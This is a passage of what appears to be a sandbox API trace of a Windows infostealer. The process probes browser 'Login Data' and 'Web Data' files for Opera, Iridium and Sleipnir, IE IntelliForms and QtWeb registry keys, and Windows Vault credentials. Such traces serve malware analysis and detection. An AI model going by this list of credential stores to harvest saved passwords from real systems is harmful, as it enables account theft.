(pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Iridium\\User Data\\Default\\Web Data") returned 0 [0174.559] GetProcessHeap () returned 0x840000 [0174.559] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x874b50 | out: hHeap=0x840000) returned 1 [0174.559] GetProcessHeap () returned 0x840000 [0174.559] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f5e) returned 0x870bc8 [0174.559] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0174.560] wvsprintfW (in: param_1=0x870bc8, param_2="%s%s\\Login Data", arglist=0x19f41c | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalIridium\\Login Data") returned 53 [0174.560] GetProcessHeap () returned 0x840000 [0174.560] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x6e) returned 0x874b30 [0174.560] GetProcessHeap () returned 0x840000 [0174.560] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870bc8 | out: hHeap=0x840000) returned 1 [0174.561] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0174.561] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalIridium\\Login Data") returned 0 [0174.561] GetProcessHeap () returned 0x840000 [0174.561] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x874b30 | out: hHeap=0x840000) returned 1 [0174.561] GetProcessHeap () returned 0x840000 [0174.561] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f6e) returned 0x870bc8 [0174.562] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0174.563] wvsprintfW (in: param_1=0x870bc8, param_2="%s%s\\Default\\Login Data", arglist=0x19f41c | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalIridium\\Default\\Login Data") returned 61 [0174.563] GetProcessHeap () returned 0x840000 [0174.563] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7e) returned 0x874b40 [0174.563] GetProcessHeap () returned 0x840000 [0174.563] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870bc8 | out: hHeap=0x840000) returned 1 [0174.564] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0174.564] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalIridium\\Default\\Login Data") returned 0 [0174.565] GetProcessHeap () returned 0x840000 [0174.565] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x874b40 | out: hHeap=0x840000) returned 1 [0174.565] GetProcessHeap () returned 0x840000 [0174.565] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8709b8 | out: hHeap=0x840000) returned 1 [0174.571] GetProcessHeap () returned 0x840000 [0174.571] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x208) returned 0x8709b8 [0174.572] LoadLibraryW (lpLibFileName="SHELL32") returned 0x74a90000 [0174.573] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x8709b8 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0175.262] GetProcessHeap () returned 0x840000 [0175.262] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f84) returned 0x870bc8 [0175.263] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0175.264] wvsprintfW (in: param_1=0x870bc8, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0x19f698 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\\\Opera\\Opera Next\\data\\User Data\\Default\\Login Data") returned 89 [0175.264] GetProcessHeap () returned 0x840000 [0175.264] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xb6) returned 0x874b58 [0175.264] GetProcessHeap () returned 0x840000 [0175.264] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870bc8 | out: hHeap=0x840000) returned 1 [0175.265] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0175.265] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\\\Opera\\Opera Next\\data\\User Data\\Default\\Login Data") returned 0 [0175.265] GetProcessHeap () returned 0x840000 [0175.265] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x874b58 | out: hHeap=0x840000) returned 1 [0175.265] GetProcessHeap () returned 0x840000 [0175.265] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f80) returned 0x870bc8 [0175.266] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0175.267] wvsprintfW (in: param_1=0x870bc8, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0x19f694 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\\\Opera\\Opera Next\\data\\User Data\\Default\\Web Data") returned 87 [0175.267] GetProcessHeap () returned 0x840000 [0175.267] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xb2) returned 0x874b50 [0175.267] GetProcessHeap () returned 0x840000 [0175.267] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870bc8 | out: hHeap=0x840000) returned 1 [0175.268] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0175.269] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\\\Opera\\Opera Next\\data\\User Data\\Default\\Web Data") returned 0 [0175.269] GetProcessHeap () returned 0x840000 [0175.269] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x874b50 | out: hHeap=0x840000) returned 1 [0175.269] GetProcessHeap () returned 0x840000 [0175.269] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f5e) returned 0x870bc8 [0175.270] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0175.270] wvsprintfW (in: param_1=0x870bc8, param_2="%s%s\\Login Data", arglist=0x19f694 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera\\Opera Next\\data\\Login Data") returned 70 [0175.270] GetProcessHeap () returned 0x840000 [0175.270] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x90) returned 0x874b30 [0175.270] GetProcessHeap () returned 0x840000 [0175.270] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870bc8 | out: hHeap=0x840000) returned 1 [0175.271] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0175.271] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera\\Opera Next\\data\\Login Data") returned 0 [0175.271] GetProcessHeap () returned 0x840000 [0175.271] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x874b30 | out: hHeap=0x840000) returned 1 [0175.272] GetProcessHeap () returned 0x840000 [0175.272] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f6e) returned 0x870bc8 [0175.272] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0175.273] wvsprintfW (in: param_1=0x870bc8, param_2="%s%s\\Default\\Login Data", arglist=0x19f694 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera\\Opera Next\\data\\Default\\Login Data") returned 78 [0175.273] GetProcessHeap () returned 0x840000 [0175.273] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xa0) returned 0x8628a8 [0175.273] GetProcessHeap () returned 0x840000 [0175.273] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870bc8 | out: hHeap=0x840000) returned 1 [0175.274] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0175.274] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera\\Opera Next\\data\\Default\\Login Data") returned 0 [0175.274] GetProcessHeap () returned 0x840000 [0175.274] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8628a8 | out: hHeap=0x840000) returned 1 [0175.274] GetProcessHeap () returned 0x840000 [0175.274] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f84) returned 0x870bc8 [0175.275] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0175.435] wvsprintfW (in: param_1=0x870bc8, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0x19f698 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\\\Opera Software\\Opera Stable\\User Data\\Default\\Login Data") returned 95 [0175.435] GetProcessHeap () returned 0x840000 [0175.435] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xc2) returned 0x868500 [0175.435] GetProcessHeap () returned 0x840000 [0175.435] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870bc8 | out: hHeap=0x840000) returned 1 [0175.541] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0175.541] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\\\Opera Software\\Opera Stable\\User Data\\Default\\Login Data") returned 0 [0175.541] GetProcessHeap () returned 0x840000 [0175.541] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x868500 | out: hHeap=0x840000) returned 1 [0175.541] GetProcessHeap () returned 0x840000 [0175.541] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f80) returned 0x870bc8 [0175.542] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0175.543] wvsprintfW (in: param_1=0x870bc8, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0x19f694 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\\\Opera Software\\Opera Stable\\User Data\\Default\\Web Data") returned 93 [0175.543] GetProcessHeap () returned 0x840000 [0175.543] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xbe) returned 0x874b50 [0175.543] GetProcessHeap () returned 0x840000 [0175.543] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870bc8 | out: hHeap=0x840000) returned 1 [0175.544] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0175.544] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\\\Opera Software\\Opera Stable\\User Data\\Default\\Web Data") returned 0 [0175.544] GetProcessHeap () returned 0x840000 [0175.544] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x874b50 | out: hHeap=0x840000) returned 1 [0175.544] GetProcessHeap () returned 0x840000 [0175.544] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f5e) returned 0x870bc8 [0175.545] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0175.546] wvsprintfW (in: param_1=0x870bc8, param_2="%s%s\\Login Data", arglist=0x19f694 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera Software\\Opera Stable\\Login Data") returned 76 [0175.546] GetProcessHeap () returned 0x840000 [0175.546] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x9c) returned 0x863328 [0175.546] GetProcessHeap () returned 0x840000 [0175.546] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870bc8 | out: hHeap=0x840000) returned 1 [0175.547] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0175.548] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera Software\\Opera Stable\\Login Data") returned 0 [0175.548] GetProcessHeap () returned 0x840000 [0175.548] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x863328 | out: hHeap=0x840000) returned 1 [0175.548] GetProcessHeap () returned 0x840000 [0175.549] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f6e) returned 0x870bc8 [0175.549] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0175.550] wvsprintfW (in: param_1=0x870bc8, param_2="%s%s\\Default\\Login Data", arglist=0x19f694 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera Software\\Opera Stable\\Default\\Login Data") returned 84 [0175.550] GetProcessHeap () returned 0x840000 [0175.550] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xac) returned 0x874b40 [0175.550] GetProcessHeap () returned 0x840000 [0175.550] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870bc8 | out: hHeap=0x840000) returned 1 [0175.551] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0175.551] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera Software\\Opera Stable\\Default\\Login Data") returned 0 [0175.551] GetProcessHeap () returned 0x840000 [0175.551] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x874b40 | out: hHeap=0x840000) returned 1 [0175.551] GetProcessHeap () returned 0x840000 [0175.551] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f84) returned 0x870bc8 [0175.552] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0175.553] wvsprintfW (in: param_1=0x870bc8, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0x19f698 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\\\Fenrir Inc\\Sleipnir\\setting\\modules\\ChromiumViewer\\User Data\\Default\\Login Data") returned 118 [0175.553] GetProcessHeap () returned 0x840000 [0175.553] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xf0) returned 0x874b58 [0175.553] GetProcessHeap () returned 0x840000 [0175.553] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870bc8 | out: hHeap=0x840000) returned 1 [0175.553] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0175.553] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\\\Fenrir Inc\\Sleipnir\\setting\\modules\\ChromiumViewer\\User Data\\Default\\Login Data") returned 0 [0175.554] GetProcessHeap () returned 0x840000 [0175.554] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x874b58 | out: hHeap=0x840000) returned 1 [0175.554] GetProcessHeap () returned 0x840000 [0175.554] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f80) returned 0x870bc8 [0175.555] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0175.556] wvsprintfW (in: param_1=0x870bc8, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0x19f694 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\\\Fenrir Inc\\Sleipnir\\setting\\modules\\ChromiumViewer\\User Data\\Default\\Web Data") returned 116 [0175.556] GetProcessHeap () returned 0x840000 [0175.556] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xec) returned 0x874b50 [0175.556] GetProcessHeap () returned 0x840000 [0175.556] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870bc8 | out: hHeap=0x840000) returned 1 [0175.556] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0175.557] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\\\Fenrir Inc\\Sleipnir\\setting\\modules\\ChromiumViewer\\User Data\\Default\\Web Data") returned 0 [0175.557] GetProcessHeap () returned 0x840000 [0175.557] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x874b50 | out: hHeap=0x840000) returned 1 [0175.557] GetProcessHeap () returned 0x840000 [0175.557] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f5e) returned 0x870bc8 [0175.557] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0175.559] wvsprintfW (in: param_1=0x870bc8, param_2="%s%s\\Login Data", arglist=0x19f694 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Fenrir Inc\\Sleipnir\\setting\\modules\\ChromiumViewer\\Login Data") returned 99 [0175.559] GetProcessHeap () returned 0x840000 [0175.559] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xca) returned 0x874b30 [0175.559] GetProcessHeap () returned 0x840000 [0175.559] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870bc8 | out: hHeap=0x840000) returned 1 [0175.560] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0175.560] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Fenrir Inc\\Sleipnir\\setting\\modules\\ChromiumViewer\\Login Data") returned 0 [0175.560] GetProcessHeap () returned 0x840000 [0175.560] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x874b30 | out: hHeap=0x840000) returned 1 [0175.560] GetProcessHeap () returned 0x840000 [0175.560] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f6e) returned 0x870bc8 [0175.561] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0175.562] wvsprintfW (in: param_1=0x870bc8, param_2="%s%s\\Default\\Login Data", arglist=0x19f694 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Fenrir Inc\\Sleipnir\\setting\\modules\\ChromiumViewer\\Default\\Login Data") returned 107 [0175.562] GetProcessHeap () returned 0x840000 [0175.562] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xda) returned 0x874b40 [0175.562] GetProcessHeap () returned 0x840000 [0175.562] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870bc8 | out: hHeap=0x840000) returned 1 [0175.563] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0175.563] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Fenrir Inc\\Sleipnir\\setting\\modules\\ChromiumViewer\\Default\\Login Data") returned 0 [0175.563] GetProcessHeap () returned 0x840000 [0175.563] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x874b40 | out: hHeap=0x840000) returned 1 [0175.563] GetProcessHeap () returned 0x840000 [0175.563] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f84) returned 0x870bc8 [0175.564] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0175.565] wvsprintfW (in: param_1=0x870bc8, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0x19f698 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\\\Fenrir Inc\\Sleipnir5\\setting\\modules\\ChromiumViewer\\User Data\\Default\\Login Data") returned 119 [0175.565] GetProcessHeap () returned 0x840000 [0175.565] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xf2) returned 0x874b58 [0175.565] GetProcessHeap () returned 0x840000 [0175.565] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870bc8 | out: hHeap=0x840000) returned 1 [0175.565] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0175.566] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\\\Fenrir Inc\\Sleipnir5\\setting\\modules\\ChromiumViewer\\User Data\\Default\\Login Data") returned 0 [0175.566] GetProcessHeap () returned 0x840000 [0175.566] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x874b58 | out: hHeap=0x840000) returned 1 [0175.566] GetProcessHeap () returned 0x840000 [0175.566] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f80) returned 0x870bc8 [0175.567] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0175.567] wvsprintfW (in: param_1=0x870bc8, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0x19f694 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\\\Fenrir Inc\\Sleipnir5\\setting\\modules\\ChromiumViewer\\User Data\\Default\\Web Data") returned 117 [0175.567] GetProcessHeap () returned 0x840000 [0175.568] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xee) returned 0x874b50 [0175.568] GetProcessHeap () returned 0x840000 [0175.568] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870bc8 | out: hHeap=0x840000) returned 1 [0175.569] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0175.569] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\\\Fenrir Inc\\Sleipnir5\\setting\\modules\\ChromiumViewer\\User Data\\Default\\Web Data") returned 0 [0175.569] GetProcessHeap () returned 0x840000 [0175.569] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x874b50 | out: hHeap=0x840000) returned 1 [0175.569] GetProcessHeap () returned 0x840000 [0175.569] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f5e) returned 0x870bc8 [0175.570] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0175.571] wvsprintfW (in: param_1=0x870bc8, param_2="%s%s\\Login Data", arglist=0x19f694 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Fenrir Inc\\Sleipnir5\\setting\\modules\\ChromiumViewer\\Login Data") returned 100 [0175.571] GetProcessHeap () returned 0x840000 [0175.571] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xcc) returned 0x874b30 [0175.571] GetProcessHeap () returned 0x840000 [0175.571] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870bc8 | out: hHeap=0x840000) returned 1 [0175.572] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0175.572] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Fenrir Inc\\Sleipnir5\\setting\\modules\\ChromiumViewer\\Login Data") returned 0 [0175.572] GetProcessHeap () returned 0x840000 [0175.573] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x874b30 | out: hHeap=0x840000) returned 1 [0175.573] GetProcessHeap () returned 0x840000 [0175.573] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f6e) returned 0x870bc8 [0175.573] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0175.574] wvsprintfW (in: param_1=0x870bc8, param_2="%s%s\\Default\\Login Data", arglist=0x19f694 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Fenrir Inc\\Sleipnir5\\setting\\modules\\ChromiumViewer\\Default\\Login Data") returned 108 [0175.574] GetProcessHeap () returned 0x840000 [0175.574] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xdc) returned 0x874b40 [0175.575] GetProcessHeap () returned 0x840000 [0175.575] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870bc8 | out: hHeap=0x840000) returned 1 [0176.098] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0176.098] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Fenrir Inc\\Sleipnir5\\setting\\modules\\ChromiumViewer\\Default\\Login Data") returned 0 [0176.098] GetProcessHeap () returned 0x840000 [0176.098] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x874b40 | out: hHeap=0x840000) returned 1 [0176.098] GetProcessHeap () returned 0x840000 [0176.098] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e8) returned 0x870bc8 [0176.098] GetProcessHeap () returned 0x840000 [0176.099] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xc) returned 0x865708 [0176.099] GetProcessHeap () returned 0x840000 [0176.099] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x84f490 [0176.099] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0176.100] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\QtWeb.NET\\QtWeb Internet Browser\\AutoComplete", phkResult=0x84f490 | out: phkResult=0x84f490*=0x0) returned 0x2 [0176.100] GetProcessHeap () returned 0x840000 [0176.100] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x84f490 | out: hHeap=0x840000) returned 1 [0176.100] GetProcessHeap () returned 0x840000 [0176.100] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870bc8 | out: hHeap=0x840000) returned 1 [0176.100] GetProcessHeap () returned 0x840000 [0176.100] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x865708 | out: hHeap=0x840000) returned 1 [0176.100] GetProcessHeap () returned 0x840000 [0176.100] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x208) returned 0x870bc8 [0176.101] LoadLibraryW (lpLibFileName="SHELL32") returned 0x74a90000 [0176.101] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x870bc8 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0176.102] GetProcessHeap () returned 0x840000 [0176.102] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f94) returned 0x870dd8 [0176.102] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0176.103] wvsprintfW (in: param_1=0x870dd8, param_2="%s\\QupZilla\\profiles\\default\\browsedata.db", arglist=0x19f848 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\QupZilla\\profiles\\default\\browsedata.db") returned 75 [0176.103] GetProcessHeap () returned 0x840000 [0176.103] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x9a) returned 0x863328 [0176.103] GetProcessHeap () returned 0x840000 [0176.103] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870dd8 | out: hHeap=0x840000) returned 1 [0176.104] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0176.104] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\QupZilla\\profiles\\default\\browsedata.db") returned 0 [0176.104] GetProcessHeap () returned 0x840000 [0176.104] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x863328 | out: hHeap=0x840000) returned 1 [0176.104] GetProcessHeap () returned 0x840000 [0176.104] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870bc8 | out: hHeap=0x840000) returned 1 [0176.108] LoadLibraryW (lpLibFileName="vaultcli.dll") returned 0x6c660000 [0180.210] GetProcAddress (hModule=0x6c660000, lpProcName="VaultEnumerateItems") returned 0x6c66b960 [0180.211] GetProcAddress (hModule=0x6c660000, lpProcName="VaultEnumerateVaults") returned 0x6c683510 [0180.212] GetProcAddress (hModule=0x6c660000, lpProcName="VaultFree") returned 0x6c677050 [0180.212] GetProcAddress (hModule=0x6c660000, lpProcName="VaultGetItem") returned 0x6c66bb70 [0180.213] GetProcAddress (hModule=0x6c660000, lpProcName="VaultGetItem") returned 0x6c66bb70 [0180.214] GetProcAddress (hModule=0x6c660000, lpProcName="VaultOpenVault") returned 0x6c66bc10 [0180.215] GetProcAddress (hModule=0x6c660000, lpProcName="VaultCloseVault") returned 0x6c66bc90 [0180.215] GetVersionExW (in: lpVersionInformation=0x19f728*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x7729cf67, dwMinorVersion=0x19f758, dwBuildNumber=0x0, dwPlatformId=0x73f09f90, szCSDVersion="㗈\x86쾓眩") | out: lpVersionInformation=0x19f728*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x2, dwBuildNumber=0x23f0, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0180.229] VaultEnumerateVaults () returned 0x0 [0180.811] GetProcessHeap () returned 0x840000 [0180.811] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e8) returned 0x873a58 [0180.811] GetProcessHeap () returned 0x840000 [0180.811] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xc) returned 0x8722f8 [0180.811] VaultOpenVault () returned 0x0 [0180.856] VaultEnumerateItems () returned 0x0 [0180.856] VaultFree () returned 0x0 [0180.856] VaultCloseVault () returned 0x6 [0180.860] VaultOpenVault () returned 0x0 [0180.861] VaultEnumerateItems () returned 0x0 [0180.868] VaultFree () returned 0x0 [0180.868] VaultCloseVault () returned 0x6 [0180.873] GetProcessHeap () returned 0x840000 [0180.873] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0180.873] GetProcessHeap () returned 0x840000 [0180.873] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8722f8 | out: hHeap=0x840000) returned 1 [0180.873] GetProcessHeap () returned 0x840000 [0180.873] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e8) returned 0x873a58 [0180.873] GetProcessHeap () returned 0x840000 [0180.873] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xc) returned 0x8722b0 [0180.901] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0180.906] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\IntelliForms\\Storage2", phkResult=0x19f860 | out: phkResult=0x19f860*=0x0) returned 0x2 [0180.948] GetProcessHeap () returned 0x840000 [0180.948] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0180.948] GetProcessHeap () returned 0x840000 [0180.948] HeapFree (in: hHeap=0x840000, 